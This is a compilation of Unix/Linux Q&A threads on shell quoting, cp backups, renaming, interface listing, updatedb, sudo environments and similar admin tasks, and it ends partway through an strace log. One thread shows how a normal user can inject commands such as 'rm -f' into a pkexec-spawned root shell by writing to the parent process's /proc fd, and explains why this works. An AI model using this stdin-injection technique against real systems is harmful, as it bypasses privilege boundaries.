I often use Lynx on a remote computer to look at websites (faster than port-forwarding). Sometimes the URLs I want to go to have un-escaped characters (for example brackets) that Lynx seems to need encoded. for example http://www.example.com/This(URL)is anExample.html should be http://www.example.com/This%28URL%29is%20anExample.html. Is there an existing script for this? Alternatively is there some option for Lynx that would make it unnecessary?
You can escape a string on the command line by using single ticks, so lynx 'http://www.example.com/This(URL)is anExample.html' Will pass the URL unchanged to lynx, or any other program.
Using URLs with parenthesis with Lynx
1,515,164,174,000
Before you hit me with the obvious, I know, the backup option makes a backup of a file. But the thing is, the cp command in general backs up a file. One could argue a copy of a file is a backup. So more precisely, my question is this: what does the -b option do that the cp command doesn't do already? The cp(1) man page gives the following description of the --backup option: make a backup of each existing destination file This definition isnt very useful, basically saying "the backup option makes a backup". This gives no indication as to what -b adds to the cp I know -b puts some suffix at the end of the name of the new file. But is there anything else it does? Or is that it? Is a -b backup just a cp command that adds something to the end of the filename? Thank you P.S. Do you typically use -b when making backups in your daily work? Or do you just stick to -a?
It makes a backup copy of each destination file that already exists. The ones that would otherwise get overwritten and lost. $ mkdir foo; cd foo $ echo hello > hello.txt $ echo world > world.txt $ cp -b hello.txt world.txt $ ls hello.txt world.txt~ world.txt $ cat world.txt hello $ cat world.txt~ world That world.txt~ being the backup file it created. If you look closely, you'll see that the backup file is actually the original file, just renamed. (i.e. the inode number stays the same, and so do e.g. the permissions of that file.)
What precisely does cp -b (--backup) actually do?
1,515,164,174,000
This thread (https://superuser.com/questions/659876/how-to-rename-files-and-replace-characters) has proven bountiful and does what I need it to do, except, I need to replace just the first instance of a character in a filename. How can I make it so that this: for f in *:*; do mv -v "$f" $(echo "$f" | tr '.' '_'); done Only replaces the first instance of . in a filename, with a filename such as: 2022-10-07T071101.8495077Z_QueryHistory.txt
Unfortunately, the method you tried is more complex than it needs to be, and fragile (it breaks if file names contain certain special characters). Here's a simpler method relying on parameter expansion to transform the file name: for f in *; do mv -v -- "$f" "${f/./_}"; done # replace the first . for f in *; do mv -v -- "$f" "${f//./_}"; done # replace every . This requires bash, ksh or zsh as the shell: other shells such as dash (which is Ubuntu's /bin/sh, so commonly used for scripting, but hardly ever used interactively) don't have the ${VARIABLE/PATTERN/REPLACEMENT} form of parameter expansion. Alternatively, you can use prename (apt install rename): rename 's/\./_/' * # replace the first . rename 's/\./_/g' * # replace every . Alternatively, you can use zsh's zmv: autoload -U zmv # put this in your .zshrc zmv '*' '${f/./_}' # replace the first . zmv -W '*.*.*' '*_*.*' # replace the next-to-last . zmv '*' '${f//./_}' # replace every . All the snippets in my answer skip files whose name begins with a dot.
Linux: rename files in loop while only targeting the first instance of a specific character
1,515,164,174,000
Also I used whereis & which command to check if the package exists and it does exist.
It is installed to /usr/sbin/tcpdump, since tcpdump is supposed to run as root user or with equivalent privilege. To verify that, you can use dpkg -L to show where the installed files are located on disk: $ dpkg -L tcpdump /. /etc /etc/apparmor.d /etc/apparmor.d/usr.sbin.tcpdump /usr /usr/sbin /usr/sbin/tcpdump <- Here it is ! /usr/share /usr/share/doc /usr/share/doc/tcpdump ... So, you can either run it with sudo tcpdump as a normal user, or switch to root user first, then run tcpdump, or add /usr/sbin to your PATH environment variable
I installed tcpdump, but it is showing command not found while using it
1,515,164,174,000
It happens every now and then that there's an application installed in my system which I don't know how to run from the command-line. To find out, I usually Google or search the output of lsof (not always successfully) after running the application from the GUI. There has to be an easier way. What is it?
Applications which you can start from your desktop environment are described by .desktop files, which are stored in /usr/share/applications and ~/.local/share/applications (strictly speaking, the corresponding XDG directories, but those are the default settings). Given an application name, as shown by your desktop environment, you can look for it in those files and find the corresponding Exec line. To do this, you can use GUI menu editors such as GNOME’s Alacarte or MenuLibre, or search on the command line. Alacarte (“Main Menu” in GNOME) shows all available applications, and the properties of each entry show the corresponding command: In a terminal window, this “Users” application can be found using grep -l Name.\*=Users {/usr,~/.local}/share/applications/*.desktop | xargs -r grep Exec= This shows Exec=gnome-control-center user-accounts and true enough, gnome-control-center user-accounts on the command line opens the corresponding panel. For DB Browser, you’d run grep -l "Name.*=DB Browser" {/usr,~/.local}/share/applications/*.desktop | xargs -r grep Exec= In some cases the Exec line will have additional arguments, e.g. %f; those are placeholders for arguments such as files.
How to tell what command opens an application?
1,515,164,174,000
I want the output of the time command to be shown only if the command, which has been passed to time was successful. Something like this: ( time wget -pq --delete-after https://www.example.com ) 2>&1 || echo fail The problem is, that if wget fails, I still receive the output from time (which is somewhere logical, as it measures how long it took for the command to fail anyway). My goal is to save the output to a variable and either have 0m0.100s or fail in my variable. Does anyone has an idea how I could do this in a decent manner?
You can do something like this: $ if var=$( { time true; } 2>&1 ); then echo "$var"; else echo fail; fi real 0m0.000s user 0m0.000s sys 0m0.000s $ if var=$( { time false; } 2>&1 ); then echo "$var"; else echo fail; fi fail
Display output of `time` only if command after `time` was successful
1,515,164,174,000
When I run duplicity with the -v8 switch I get the following output: M home/user/Documents/test.txt D home/user/VirtualBox VMs/win10/Logs/VBox.log.2 A home/user/.config/VirtualBox/example.log What does the capital letters in front of the paths mean?
I could not find this documented; probably my Google-fu is lacking, but the flags you mentioned, A, D, and M, appear to stand for "added", "deleted", and "modified", respectively, according to the source code (in diffdir.py): log.Info(_("A %s") % (util.ufn(delta_path.get_relative_path())), log.InfoCode.diff_file_new, util.escape(delta_path.get_relative_path())) (...) log.Info(_("D %s") % (util.ufn(sig_path.get_relative_path())), log.InfoCode.diff_file_deleted, util.escape(sig_path.get_relative_path())) (...) log.Info(_("M %s") % (util.ufn(delta_path.get_relative_path())), log.InfoCode.diff_file_changed, util.escape(delta_path.get_relative_path()))
What does the A, D and Ms mean when running Duplicity with high verbosity?
1,515,164,174,000
How can I receive the output of two or more independent processes in a third location without affecting the two processes? I have two processes, A and B, each running in their own screen, continuously outputting stuff. I can run screen and attach to A to see its output: 12:00 Foo. 12:02 Foo. 12:04 Foo. Same with B: 12:01 Bar. 12:03 Bar. 12:05 Bar. And I can combine multiple screens to see both side-by-side or similar. But I am looking for a way to see the output of these two processes combined into one "stream" of messages: 12:00 Foo. 12:01 Bar. 12:02 Foo. 12:03 Bar. 12:04 Foo. 12:05 Bar. While also not being able to inadvertently send something like CTRL + C to one of the processes. (I still want to be able to reattach to the processes and interact with them from time to time, which is why I've been using screen.) Thus I don't think I would want to run the two processes together and look at the output directly. I could use strace to do something like this: strace -PIDofA -e write & strace -PIDofB -e write & But the output is not very pretty: write(1, "12:00 Foo.", 10) = 10 write(5, "Foo in file.", 12) = 12 write(1, "12:01 Bar.", 10) = 10 write(5, "Bar in file.", 12) = 12 ... and it doesn't feel like a good solution to run multiple strace this way to get the combined output. Perhaps I could make both processes write to a file, and do something like: tail -f output.txt But I'm not sure if that will cause problems as the file gets filled with more and more lines of output. And I'm not sure what happens when two processes attempt to write to the same file at the same time. So what tool do I use, or how do I redesign my processes so as to display the output of A and B together? (I'm running this on Debian and accessing it through ssh, if that makes a difference.)
You can pipe the output of each command to tee file and tail -f the file. There is no synchronization between the processes so the output will be interleaved (in possibly ugly fashion). If you are worried about filling up the disk, you might be able to output to a named pipe instead: [first screen] $ mkfifo /tmp/foo $ tail -f /tmp/foo [second screen] $ command1 | tee /tmp/foo [third screen] $ command2 | tee /tmp/foo
Combine output from multiple independent processes in another terminal
1,515,164,174,000
I'm trying to use GNU Parallel to run a comman mutliple times with a combination of constant and varying arguments. But for some reason the constant arguments are split on white-space even though I've quoted them when passing them to parallel. In this example, the constant argument 'a b' should be passed to debug-call as a single argument instead of two: $ parallel debug-call 'a b' {} ::: {1..2} [0] = '[...]/debug-call' [1] = 'a' [2] = 'b' [3] = '1' [0] = '[...]/debug-call' [1] = 'a' [2] = 'b' [3] = '2' debug-call is a simple script which prints each argument it has been passed in argv. Instead I would expect to see this output: [0] = '[...]/debug-call' [1] = 'a b' [2] = '1' [0] = '[...]/debug-call' [1] = 'a b' [2] = '2' Is this a bug or is there a option to prevent GNU Parallel from splitting command line arguments before passing them on to the command?
parallel runs a shell (which exact one depending on the context in which it is called, generally, when called from a shell, it's that same shell) to parse the concatenation of the arguments. So: parallel debug-call 'a b' {} ::: 'a b' c is the same as parallel 'debug-call a b {}' ::: 'a b' c parallel will call: your-shell -c 'debug-call a b <something>' Where <something> is the arguments (hopefully) properly quoted for that shell. For instance, if that shell is bash, it will run bash -c 'debug-call a b a\ b' Here, you want: parallel 'debug-call "a b" {}' ::: 'a b' c Or parallel -q debug-call 'a b' {} ::: 'a b' c Where parallel will quote the arguments (in the correct (hopefully) syntax for the shell) before concatenating. To avoid calling a shell in the first place, you could use GNU xargs instead: xargs -n1 -r0 -P4 -a <(printf '%s\0' 'a b' c) debug-call 'a b' That won't invoke a shell (nor any of the many commands ran by parallel upon initialisation), but you won't benefit from any of the extra features of parallel, like output reordering with -k. You may find other approaches at Background execution in parallel
Prevent GNU parallel from splitting quoted arguments
1,515,164,174,000
I have a file x1 in one directory (d1) and I'm not sure if the same file is already copied (x2) in another directory (d2) (but automatically renamed by application). Can I check if hash of file x1 from directory d1 is equal to hash of some file x2 existing in directory d2?
This is a good approach, but the search will be a lot faster if you only calculate hashes of files that have the right size. Using GNU/BusyBox utilities: wanted_size=$(stat -c %s d1/x1) wanted_hash=$(sha256sum <d1/x1) find d2 -type f -size "${wanted_size}c" -execdir sh -c 'test "$(sha256sum <"$0")" = "$1"' {} "$wanted_hash" \; -print
Find a file by hash
1,515,164,174,000
As a part of our project we should classify sound samples (stored as .wav files). All sample is the same, just pure speech (like a Skype test call). The process is the following: a reference wav, this is the "high quality" sample comparing approx. 1000 wav files calculating divergence from the reference wav one by one Is there any Linux tool for that?
What I believe you are trying to measure (by stating divergence) is the PESQ, Perceptual Evaluation of Speech Quality, of each file. This is a standarized form ITU-T recommendation P.862 (02/01) http://en.wikipedia.org/wiki/PESQ. You have different projects implementing what you are searching for. For example https://github.com/imankulov/speex-quality-evaluation
Comparing .wav samples from command line
1,515,164,174,000
I am working in the computer at home I want to send me an email and I tried: uuencode all.sh all.sh | mail [email protected] But the problem is that nothing arrive to my email, I just get the following error: mail: cannot send message: Process exited with a non-zero status The fact is that I use the same command in the work and it works well I would like to appreciate any suggestion to fix this problem. I am not sure If a have to set up any file before to use that command line in my personal computer. I tried also with installing mutt: mutt [email protected] < all.sh but I got the following error: sendmail: Cannot open mail:25 Error sending message, child exited 1 (). Could not send the message.
The basic mail command is only a mail reader and composer, it doesn't know how to talk to a server over the network (with the SMTP protocol). Talking SMTP is the job of a MTA (message transfer agent). The default MTA on Ubuntu is Postfix. To configure Postfix, run sudo dpkg-reconfigure postfix If you only want to send mail and not receive any, choose “Satellite system”. Note that unless you have a permanently-connected machine, with suitable DNS entries, and preferably with a static IP address, you can't directly receive mail: you have to use an external server, and then fetch the mail using a protocol such as IMAP. Ubuntu includes several versions of the mail command. The heirloom-mailx version does know how to talk SMTP. You configure it in ~/.mailrc. The configuration might look something like this: set smtp=smtp.example.com set smtp-use-starttls set smtp-auth-user=neo33 set smtp-auth-password=swordfish
What should I configure to send mail on the command line?
1,515,164,174,000
I am looking to retrieve a list of network interfaces. Currently I am returning the results of ip addr and then doing some regex/string searching from output like this: 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 84: eth0@if85: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff inet 172.17.0.2/16 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::42:acff:fe11:2/64 scope link tentative valid_lft forever preferred_lft forever I don't really care about all the meta data, I am just looking for the interface names. So I would like to instead get: 1: lo 84: eth0@if85 Is there a way to filter the results of the ip addr command? I can definitely do some other cli magic or just regex magic in my app, but it'd be nice to have ip itself filter.
Yes, you can. Using grep with PCRE(-P): ip addr | grep -Po '^\d+:\s+\K[^:]+' ^\d+:\s+ matched the portion before interface name at the start, \K discards the match [^:]+ gets the portion upto the next : i.e. the interface name Similar logic using sed: ip addr | sed -nE 's/^[[:digit:]]+:[[:blank:]]+([^:]+).*/\1/p' On my system: % ip addr | grep -Po '^\d+:\s+\K[^:]+' lo eth0 wlan0 % ip addr | sed -nE 's/^[[:digit:]]+:[[:blank:]]+([^:]+).*/\1/p' lo eth0 wlan0 What you should really do: Linux kernel provides an interface for peeking into the hardware, it is sysfs, mounted on /sys. You can get the interface name by just getting to the appropriate location of /sys, /sys/class/net/ directory precisely. On my system: % ls -1 /sys/class/net/ eth0 lo wlan0 Each of these are directories, with the subdirectories containing files and directories having all the info regarding the interface. Here's the listing of the contents of /sys/class/net/eth0 directory: % ls -1 /sys/class/net/eth0 addr_assign_type address addr_len broadcast carrier carrier_changes device dev_id dev_port dormant duplex flags gro_flush_timeout ifalias ifindex iflink link_mode mtu name_assign_type netdev_group operstate phys_port_id phys_port_name phys_switch_id power queues speed statistics subsystem tx_queue_len type uevent Answer to the edited question: To get the interface name along with index: grep: ip addr | grep -o '^[0-9]\+:[^:]\+' sed: ip addr | sed -nE 's/^([[:digit:]]+:[^:]+).*/\1/p' For each interface directory in /sys/class/net/, you can read the file ifindex. For example for interface eth0, the index file is: /sys/class/net/eth0/ifindex
Can I get just the list of network interfaces from ip?
1,515,164,174,000
I have a simple bash script bash.sh that starts another bash instance using pkexec. #!/bin/bash bash -c 'pkexec bash' When executed this shows a prompt for the user to enter their password. The main script bash.sh runs as normal user but the bash instance started by it runs as root with elevated privileges. When I open a terminal window and try to write some command to the standard input of the elevated bash process it throws a permission error (as expected) . echo 'echo hello' > /proc/<child-bash-pid>/fd/0 The problem is that when I write to the parent process (bash.sh) it gets passed to the child bash process which then executes the command. echo 'echo hello' > /proc/<parent-bash.sh-pid>/fd/0 I'm not able to understand how this is possible? Since the parent is running as a normal user why am I (a normal user) allowed to pass commands to the child process which is running with higher privileges? I understand the fact that the standard input of the child process is connected to the standard input of the parent script, but if this is allowed then any ordinary process can execute root commands by writing to the parent process of a rooted bash process. This does not seem logical. What am I missing? Note: I verified that the child is executing the command passed to the parent by deleting a file in /usr/share which only root would have permission to do. sudo touch /usr/share/testfile echo 'rm -f /usr/share/testfile' > /proc/<parent-bash.sh-pid>/fd/0 The file was deleted successfully.
This is normal. To understand it, let's see how file descriptors work and how they are passed between processes. You mentioned that you are using GLib.spawn_async() to spawn the shell script. That function, presumably, creates a pipe to be used for sending data into the child's stdin (or perhaps you create the pipe yourself and pass it to the function). To spawn the child process, that function will fork() off a new process, rearrange its file descriptors such that the stdin pipe becomes fd 0, and then exec() your script. Since the script starts with #!/bin/bash, the kernel interprets this by exec()ing a bash shell, which then runs your shell script. That shell script forks and execs yet another bash (this is redundant, by the way; you don't really need the bash -c in there). No file descriptors are rearranged, so the new process inherits the same pipe as its stdin file descriptor. Note that this isn't "connected" to its parent process per se - in fact, the file descriptors reference one and the same pipe, the one that was created or assigned by GLib.spawn_async(). In effect, we are merely creating aliases for the pipe: fd 0 in these processes all reference the pipe. The process is repeated when pkexec is invoked - but pkexec is a suid root binary. That means that, when that binary is exec()ed, it runs as root, yet its stdin is still connected to the original pipe. pkexec then does its permission checks (which involve prompting for a password), and then ultimately exec()s bash. Now we have a root shell which is taking its input from a pipe, while a number of other processes owned by your user also have a reference to that pipe. The important thing to understand is that, under POSIX semantics, file descriptors have no permissions. Files have permissions, but file descriptors represent the privilege to access a file (or an abstract buffer like a pipe). You can pass a file descriptor to a new process, or even to an existing process (via UNIX sockets), and the permission to access the file travels with the file descriptors. You can even open a file, then change its owner to another user, and yet still access the file through the original fd as the previous owner, since permissions are only checked at the time the file is opened. In this way, file descriptors allow communication across privilege boundaries. By having a process owned by your user and a process owned by root share the same file descriptor, you are granting both processes the same rights over that file descriptor. And, since the fd is a pipe, and the root process is taking commands from that pipe, that allows the other process owned by your user to issue commands as root. The pipe itself has no concept of an owner, just a series of processes that happen to have open file descriptors to it. Furthermore, since the basic Linux security model assumes that a user has complete control over all of their processes, that means you can peek into /proc to gain access to the fd, as you have done. You can't do this via the /proc entry of the bash process running as root (since you aren't root) but you can do it for your own process, and the resulting pipe file descriptor acquired is exactly the same as if you could do it directly to the child process running as root. Thus, echoing data into the pipe causes the kernel to bounce it back to the processes reading from the pipe - in this case, only the child root shell, which is actively reading commands from the pipe. If the shell script were invoked from a terminal, then echoing data into its standard input file descriptor would actually end up writing data to the terminal, and it would be displayed to the user (but not executed by the shell). This is because terminal devices are bidirectional, and, in fact, the terminal would be connected to both stdin and stdout (and stderr). However, terminals have special ioctl methods for injecting input data, so it it still possible to inject commands into the root shell as a user (it just takes more than a simple echo). In general, you've discovered an unfortunate truth about privilege escalation: the moment you allow a user to escalate to a root shell by any means, effectively, any application run by that user should be assumed to be able to abuse that escalation (while it exists). The user becomes root, for security intents and purposes. Even if this kind of stdin injection weren't possible, for example, if you were running the script under a terminal, you could simply use X server keyboard injection support to send commands directly at the graphical level. Or you could use gdb to attach to a process with the open pipe and inject writes into it. The only way to close this hole is to have the root shell directly connected to a secure I/O channel to the (physical) user that cannot be tampered with by unprivileged processes. This is hard to do without severely restricting usability. One last thing worth noting: normally, (anonymous) pipes have a read end and a write end, i.e. two separate file descriptors. The end passed to the child processes as stdin is the read end, while the write end would stay in the original process that called GLib.spawn_async(). That means that the child processes can't actually write into stdin to send data back to themselves or to the bash running as root (of course, processes don't normally write into stdin, though nothing says you can't - but in this case it wouldn't work when stdin is the read end of a pipe). However, the kernel's /proc mechanism for accessing file descriptors from another process subverts this: if a process has an open fd to the read end of a pipe, but you try to open its respective /proc fd file for writing, then the kernel will actually give you the write end of the same pipe instead. Alternatively, you could go look for the /proc entry corresponding to the original process that called GLib.spawn_async(), find the end of the pipe that is open for writing, and write into that, which would not depend on this special kernel behavior; this is mostly a curiosity but doesn't really change the security issue.
Executing commands in an elevated bash process by writing to the standard input of its parent script process
1,515,164,174,000
I would like to send stdout to multiple commands, however I'm not sure how do I read from standard input within process substitution? My attempts: $ echo foo >(cat /dev/stdin) >(cat /dev/stdin) foo /dev/fd/63 /dev/fd/62 $ echo foo >(cat -) >(cat -) foo /dev/fd/63 /dev/fd/62 $ echo foo >(cat <&3) >(cat <&3) 3<&0 foo /dev/fd/63 /dev/fd/62 -bash: 3: Bad file descriptor -bash: 3: Bad file descriptor Alternative version of the same problem: $ cat file | tee &>/dev/null >(cmd1 /dev/stdin) >(cmd2 /dev/stdin) What's the right way of doing this?
This reads from stdin: echo foo | tee >(read line </dev/stdin; echo "internal $line") You have to keep in mind that a process substitution acts "like" a file. It could be used where a file is expected. The command tee expects to write to a file. In that command we are being specific about the device to read from with: /dev/stdin. In that simple example, the /dev/stdin could be removed and that will work also: echo foo | tee >(read line; echo "internal $line") If I am understanding your need correctly, this will work: $ echo foo | tee >(read a </dev/stdin; echo "a is $a") \ >(read b </dev/stdin; echo "b is $b") \ >(read c </dev/stdin; echo "c is $c") foo a is foo c is foo b is foo I omitted the PS2 prompt to reduce confusion. Note that each Process Substitution replaces the use of a file (as: tee FILE FILE ....). The read does not have to be the first command. $ echo foo > >(echo "hello" | read b; read a </dev/stdin; echo "a is $a") a is foo Note that here the "Process Substitution" needs a redirection, that is the reason of the two > >( idiom. A simple echo, will only print the number of the fd used (the name of the file): $ echo >(echo "hello") /dev/fd/63 hello It is similar to: $ echo "$file" filename Whereas this is a very different idiom: $ echo > "$file"
How to read from stdin in process substitution? [duplicate]
1,515,164,174,000
I am attempting to update a single directory I created. I'm using updatedb so it will be found by the locate command. Command used: updatedb --localpaths='/frodo/lib/modules/3.12.3-031203-generic/kernel' Output: updatedb: unrecognized option '--localpaths=/frodo/lib/modules/3.12.3-031203-generic/kernel' Same result with: updatedb --localpaths= updatedb: unrecognized option '--localpaths=' From man updatedb: --localpaths='path1 path2...' Non-network directories to put in the database. Default is /. Why does it give this error when --localpaths is clearly stated as an option? Sytem info: updatedb --version updatedb (mlocate) 0.26 Copyright (C) 2007 Red Hat, Inc. All rights reserved. This software is distributed under the GPL v.2. This program is provided with NO WARRANTY, to the extent permitted by law. lsb_release -a LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64: core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2- noarch:core-4.0-amd64:core-4.0-noarch Distributor ID: Ubuntu Description: Ubuntu 13.10 Release: 13.10 Codename: saucy uname -r 3.12.3-031203-generic Edit: I have had success with updatedb -U /frodo/lib/modules/3.12.3-031203-generic/kernel, but I would still like to know why the --localpaths from the manual is not recognized. This alternative option is not in the manual, but found with updatedb -h. -U, --database-root PATH the subtree to store in database (default "/")
There are two popular implementations of updatedb. One of them is from GNU findutils. Another is mlocate. They support different command line options and configuration files, especially for the updatedb program. It appears that the updatedb command on your system is the one from mlocate but the man page is the one from findutils. Normally, Ubuntu has a system (inherited from Debian) called alternatives which ensures that when there are multiple implementations of a program, the choice of program and the choice of man page are consistent. However, in this case, the updatedb man page isn't recorded in the list of alternatives, only the locate executable, the locate man page and the updatedb executable are. This is because the updatedb man pages are in a different section: findutils puts it in section 1 but mlocate puts it in section 8. Thus man 1 updatedb shows the updatedb(1) man page, because it's the only updatedb man page in section 1. And man updatedb shows the man page in section 1 because that's the first section with a match. Arguably, that's a packaging bug in mlocate: the findutils and mlocate package maintainers should agree to put the man pages for updatedb in the same section, and mlocate should declare an alternative for its man page; since mlocate puts updatedb in /usr/bin, its man page should be in section 1. As things stand, you can see the man page for the mlocate updatedb with man 8 updatedb. The mlocate implementation of updatedb doesn't have an option that's exactly equivalent to findutils's --localpaths. You can create a separate database and specify what subtree it contains with the --database-root option, or run updatedb --database-root / --database-root /frodo/lib/modules/3.12.3-031203-generic/kernel.
Updatedb unrecognized option '--localpaths='
1,515,164,174,000
Silly question, but hopefully some easy rep for someone. I am new to the linux/open source community, and I find it very feature rich, but often confusing. I am trying to configure a speedy environment for research, and want to know how to initiate a program from the terminal and, if possible, to predetermine which area of the desktop it occupies from the start. Also, I tend to use secondary monitors for extra screen real estate, if you can, please answer with respect to that.
Launching a program from the terminal is as easy as running the executable. For example: $ firefox & The '&' above is optional, and it puts the process in the background, which lets you immediately run another program in the same terminal. You can only pre-determine the screen location of the program's window if the program accepts an argument to do so. Most X programs will accept a -geometry option which can be used to set the X-location, Y-location, width, and height of the window, but there is no requirement that graphical programs accept any such parameter.
Initiating programs from command line
1,515,164,174,000
If I get the result of a command on a variable, how can I print this output with new lines. Silly example: XX=$(ls -l); echo $XX When I execute the above sentence, I have one line ilegible result instead of a formatted return as I saw when ls -l is executed on a terminal. Is there any way to get the result of a command formatted or to display it's result with newlines?
You need double quotes to make the shells don't perform field splitting: XX="$(ls -l)"; echo "$XX" But it's not good to use echo with variable that you don't know its content, you should use printf (read this answer) instead: XX="$(ls -l)"; printf '%s\n' "$XX"
Print newlines on command output
1,515,164,174,000
Please explain this command in detail. I am using this command to find large files above 6 MB and split them into 5 MB chunks in the same folder. Then it removes the original files (larger than 6MB) in the same directory. find . -size +6M -exec split -d -b 5M {\} {}-part \; | find . -size +6M -exec rm -rf {} \; I have no idea about the purpose of the following portion of the command: {\} {} My aim is to develop a script for backing up Virtualmin domains to Amazon S3 buckets monthly. Due to a 5 GB PUT limit on Amazon S3, I have to split the domain backups (tar.gz) in sizes less than 5 GB.
From the manpage of find: The string `{}' is replaced by the current file name being processed everywhere it occurs in the arguments to the command... So, the first part of the find command searches for files greater than 6 MB and executes (-exec) split on every found file. For Example, if the found file is ./path/to/file, the command executed would be: split -d -b 5M ./path/to/file ./path/to/file-part {} is the placeholder replaced with the filepath. The {\} is unnecessary it could also be {}. In the second find command - the one after the pipe (|) - the find command calls rm -rf for every file.
What does `{\} {}` mean in `find` command?
1,515,164,174,000
When I work with the terminal and use su or sudo to execute a command with the root user's permissions, is it possible to apply the configuration of my "non-root user" (from which I am invoking su or sudo) stored in this user's home directory? For instance, consider that (being logged on as a non-root user) I would like to edit the configuration file /etc/some_file using vim and that my vim configuration file is located at /home/myuser/.vimrc. Firing up the command line and typing sudo vim /etc/some_file, I would want "my" beautiful and well-configured vim to show up. But what I get is an ugly vim with the default configuration, no plugins etc. Can I make su or sudo use my user's configuration files instead of the root user's files located at /root?
Use sudo -E to preserve your environment: $ export FOO=1 $ sudo -E env | grep FOO FOO=1 That will preserve $HOME and any other environment variables you had, so the same configuration files you started with will be accessed by the programs running as root. You can update sudoers to disable the env_reset setting, which clears out all environment variables and is generally enabled by default. You may have to enable the ability to use sudo -E at all in there as well. There are a few other sudoers settings that might be relevant: env_keep, which lets you specify specific variables to keep by default, and env_remove, which declares variables to delete always. You can use sudo sudo -V to see which variables are/are not preserved. An alternative, if you can't modify sudoers, is to provide your environment explicitly: sudo env HOME=$HOME command here You can make a shell alias to do that automatically so you don't have to type it in. Note that doing this (either way) can have potentially unwanted side effects: if the program you run tries to make files in your home directory, for example, those files will be created as root and your ordinary user won't be able to write to them. For the specific case of vim, you could also put your .vimrc as the system-wide /etc/vimrc if you're the only user of this system.
Use non-root user configuration for root account
1,515,164,174,000
I would like to execute source ~/.bashrc every time I finish editing a file with vim (i.e. after :wq vim command). How should I configure vim or bash to work that way?
A direct way to do it: vim ~/.bashrc && source $_ You can make an alias: alias vimbashrc='vim ~/.bashrc && source $_' This works in bash or zsh. In other shell, you must explicit name .bashrc to source to make it work: alias vimbashrc='vim ~/.bashrc && source ~/.bashrc'
Configure bash and/or vim to execute source ~/.bashrc every time I finish editing it
1,515,164,174,000
When I copy, move, or delete a file in Nautilus or using the corresponding commands (cp, mv, or rm) does the same tool perform the action behind the wraps? I ask because nautilus tends to hang on big files or too many files. I have the impression that it's not that efficient.
No it doesn't just make calls to cp, mv, etc. Rather, it makes calls to a GTK+ library that contains wrapper functions around C/C++ system libraries that also contain functions. It is these C/C++ functions that are shared across Nautilus and commands such as cp, mv, etc. Example You can use the system tracing tool strace to attach to a running nautilus process like so: $ strace -Ff -tt -p $(pgrep nautilus) 2>&1 | tee strace-naut.log Now if we perform some operations within Nautilus we'll see the system calls that are being made. Here's a sampling of the logs during the copy/paste of file /home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz. [pid 25897] 22:28:36.909183 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 25897] 22:28:36.909259 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", R_OK) = 0 [pid 25897] 22:28:36.909302 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", W_OK) = 0 [pid 25897] 22:28:36.909339 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", X_OK) = -1 EACCES (Permission denied) [pid 25897] 22:28:37.580109 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 25897] 22:28:37.580169 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", R_OK) = 0 [pid 25897] 22:28:37.580215 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", W_OK) = 0 [pid 25897] 22:28:37.580249 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", X_OK) = -1 EACCES (Permission denied) [pid 26667] 22:28:39.222446 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 26667] 22:28:39.222981 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 26667] 22:28:39.223201 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 26667] 22:28:39.223304 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 26667] 22:28:39.223397 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0 [pid 26667] 22:28:39.223444 open("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", O_RDONLY) = 46 [pid 26667] 22:28:39.223658 open("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", O_WRONLY|O_CREAT|O_EXCL, 0664) = 47 [pid 25897] 22:28:39.235249 read(14, "\f\0\0\0\0\1\0\0\0\0\0\0000\0\0\0ULD_Linux_V1.00."..., 1024) = 96 [pid 26667] 22:28:39.388744 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", <unfinished ...> [pid 26667] 22:28:39.388853 chmod("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", 0100664 <unfinished ...> [pid 26667] 22:28:39.388959 stat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", <unfinished ...> [pid 26667] 22:28:39.389061 utimes("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", {{1388460519, 222672}, {1384901700, 0}} <unfinished ...> [pid 26667] 22:28:39.391274 